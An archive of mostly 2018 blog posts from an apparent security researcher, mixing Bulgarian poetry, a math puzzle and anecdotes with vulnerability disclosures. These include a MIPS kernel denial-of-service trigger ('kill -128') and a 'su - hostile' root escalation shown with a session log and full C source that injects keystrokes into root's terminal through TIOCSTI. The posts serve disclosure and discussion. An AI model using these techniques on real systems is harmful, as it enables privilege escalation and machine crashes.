Fri Dec 7 15:04:34 EET 2018

Πoeзия (1) / Poetry (1)

Поезия (1) / Poetry (1)

Носете си новите дрехи, момчета,
падаме, както ходим,
умираме, както спим.
Въпросите на тая планета
я решим,
я не решим…

Но не казвайте: утре ще бъдем красиви.
Не казвайте: утре ще бъдем щастливи.
Не казвайте: утре ще бъдем, ще бъдем…
Ще обичаме утре,
утре ще бъда любим.
Носете си новите дрехи, момчета,
падаме, както ходим,
умираме, както спим.

Не казвайте: утре ще почнем голямото,
днес да спечелим пари за прехраната.
Не казвайте: утре да бъдем честни,
днес тихичко
ще се проврем…
Носете си новите дрехи, момчета,
ходейки падаме,
сънувайки мрем.

Не казвайте: утре с вик на площада
ще кажа истината, после – на клада!
На клада, но утре. А днес потърпете,
днес се налага
да премълчим…
Носете си новите дрехи, момчета –
падаме, както ходим,
умираме, както спим!

Стефан Цанев


====

Стихът се ражда не от щастие ли несъучастие,
Ражда го болката.
Но колко?
Като при всяка наркоза
Важна е дозата.

Дамян Дамянов

Very rough translation:

The verse is not born by happiness or non-cooperation,
It is born by the pain.
But how much?
Like in narcosis
It depends on the dose.

Posted by blah | Permanent link

Mon Sep 24 16:14:26 EEST 2018

Math challenge of the day 2018-09-24


Math challenge of the day 2018-09-24

For complex $x$ define 

f(x)=exp(x^2)-exp(x)-1

Is it true that f(5 i pi) = 0?

We have strong numerical evidence with precision
100 decimal digits but some meromorphic doubts too ;)

gp/pari session (warning, gp is very buggy):

parisize = 8000000, primelimit = 500000, nbthreads = 2
? \p 100
   realprecision = 115 significant digits (100 digits displayed)
? f(x)=exp(x^2)-exp(x)-1
%1 = (x)->exp(x^2)-exp(x)-1
? f(5*I*Pi)
%2 = 6.952351934431877974 E-108 + 0.E-114*I

Cheers for the day.

Posted by cheers | Permanent link

Sat Sep 8 15:43:51 EEST 2018

On immortality in computer games


On immortality in computer games

When I younger so much younger than today I was playing with computer
games in unorthodoxal way. Instead of playing the game like a user, I
changed the games so the player was immortal. Maybe more precisely the
player had infinite number of lives.

In short the process was: analyze the code and change features you
don't like, like finishing the game because of death. In some sense
this was immortality in the game.

Per rough memory there were several types of immortality

(1) Instant free rebirth, starting from the beginning of the level
(2) No way to die
optionally
(3) Super natural skills like passing thru walls, including exiting
the screen from right and appearing on the screen from the left.

The hardware was Правец 82 (the socialist cloning of Apple II):
8 bit processor 6502, about 64Kb memory, including video memory and
ROM.

My "customers" were the colleagues of my father, engineers and
professors. They reached the end of a patched game and the game told
them: "You are very skilled and win monetary award, call #american
number". They didn't call, partially because the game was pirated.

Similar stuff appears in science fiction. 

Implementing this in Internet Of Things will make great mess, it is
just a matter of time.


Posted by Game Immortality Inc. | Permanent link

Sun Jul 1 19:00:40 EEST 2018

coverity scan of qmail -- 53 potential defects (with false positives)


coverity scan of qmail -- 53 potential defects (with false positives)

coverity is commercial static source code analyzer accepting some
open source projects for free.

Did a scan of djb's qmail, the results are at:

https://scan.coverity.com/projects/qmail


the tool gave only 53 defects. Quick scan suggests that the non-false
positives are logically dead code or file race conditions (might be wrong about this).

to access the defects, you will need coverity account (free,
captchas).

djb is giving monetary bounty for qmail, owing me a bounty he couldn't
reproduce because of lack of virtual memory on old freebsd ;)


Posted by djb owes me a bounty | Permanent link

Sat Jun 30 09:19:47 EEST 2018

BUG_ON() on mips kernels 4.17.2 and earlier (old but alive)

BUG_ON() on mips kernels 4.17.2 and earlier (old but alive)

This is old but alive.

On mips kernel 4.17.2 and earlier unprivileged user can trigger
BUG_ON() possibly causing denial of service on the whole machine.

Suggested patches from 2013 are in the thread at:
https://www.spinics.net/lists/mips/msg73398.html


in 4.17.2 ./kernel/exit.c

do_group_exit(int exit_code)
{
        struct signal_struct *sig = current->signal;

        BUG_ON(exit_code & 0x80);

|do_group_exit| is called from

./kernel/signal.c:2482:         do_group_exit(ksig->info.si_signo);

Appears to me si_signo can be 0x80 (in decimal 128) because of:

arch/mips/include/uapi/asm/signal.h:15:#define _NSIG            128

Probably testcase will be:
$kill -128 `pidof program`


Posted by BUG ON | Permanent link

Wed Jun 13 12:25:34 EEST 2018

Ancient "su - hostile" vulnerability in debian 8 and 9

Ancient "su - hostile" vulnerability in debian 8 and 9

Just FYI.

Warning: This is rather old, since at least 2005, probably
much earlier. Check the links at:
http://www.openwall.com/lists/oss-security/2018/06/12/2

Summary: Doing "su - hostile" in debian 8 and 9 may lead
to root privilege escalation. Default sudo -u probably is
affected too.

Per chat with some admins they use su - user.

Session:

root@machine1:~# su - guest4
guest4@machine1:~$ (sleep 10; /tmp/a.out id) &
[1] 4737
guest4@machine1:~$ exit
logout
### just wait
root@machine1:~# id
uid=0(root) gid=0(root) groups=0(root)
root@machine1:~# cat /tmp/tty.c 
/*
 *
 * https://unix.stackexchange.com/questions/48103/construct-a-command-by-putting-a-string-into-a-tty
 * */
#include <sys/ioctl.h>
#include <termios.h>
#include <stdio.h>
#include <stdlib.h>

void stackchar(char c)
{
  if (ioctl(0, TIOCSTI, &c) < 0) {
    perror("ioctl");
    exit(1);
  }
}
int main(int argc, char *argv[])
{
  int i, j;
  char c;

  for (i = 1; i < argc; i++) {
    for (j=0; (c = argv[i][j]); j++) {
      stackchar(c);
    }
    stackchar('\n');
  }
  exit(0);
}

Posted by su do we | Permanent link

Tue Jun 12 12:51:05 EEST 2018

Are `su user' and/or `sudo -u user sh' considered dangerous?

Are `su user' and/or `sudo -u user sh' considered dangerous?

Per vague memory I discussed half of this with some linux crowd and
they said "won't fix" long ago.

`su user' and `sudo -u user sh' give the user the fd of root's tty
and it is readable and writable. After closing the session, the
user can keep it and on root's tty potentially do:

1. inject keypresses via ioctl()
and/or
2. read the output of root's tty, probably with some analogue of
tee(1).

Is this really a concern?

Any workarounds?


Posted by sudo su - root | Permanent link

Wed Jun 6 16:20:52 EEST 2018

Near death experience

Near death experience

Long ago I have lost consciousness. According to the doctors' logs
have been very close to death. To my surprise I have memories about
this time: Flying in a tunnel with very strange lights and everything
was super calm. Never saw such lights even in computer games. The
closest of one of lights is the light of eyes examination with light
source and pupils widened.

Wikipedia has a page "Near death experience". Looks like establishment
science has some interest in this stuff, lol.

Posted by nde | Permanent link

Thu May 31 16:18:27 EEST 2018

joke 2018-05-31

What is your sexual fantasy?
He dies during sex and leaves me $150M USD

Posted by joke | Permanent link

Mon May 28 13:55:32 EEST 2018

Stories from the past: the qmail-smtpd on freebsd exploit


Stories from the past: the qmail-smtpd on freebsd exploit

The qmail smtpd exploit on freebsd is probably the most bragable 
of my exploits. The advisory is at [1] and is rather short.
Don't remember it is so because of "if it was hard to write, it must be
hard to understand".

I don't like this exploit much, the *BSD kernel stuff is better IMHO.

The provably exploitable part of the advisory is:
---
char *p;
int i; /*XXX signed int*/
...
p[i]=0;
---

In case $i$ is negative, this is out of bounds write. It is not
integer overflow, more like memory corruption.

The process of discovery was rational [^2] dirty labour:
1. analyze
2. test
3. in case of failure (almost surely it fails) repeat
4. return SUCCESS

The process took _long_. Temporary gave up several times, until I
pressed the lucky keys.

Exploitability required about 20GB of virtual memory.

djb basically replied: "This is not a bug, this is a feature. Nobody gives so
much virtual memory to qmail".

The strongest counterclaims to djb's answer are:
1. The installation instructions don't mention limits
2. In the future libc alone can become larger than the limits

[1] http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
[^2]: in math irrational and transcendental stuff are more interesting
than rational stuff.


Posted by qmail-smtpd | Permanent link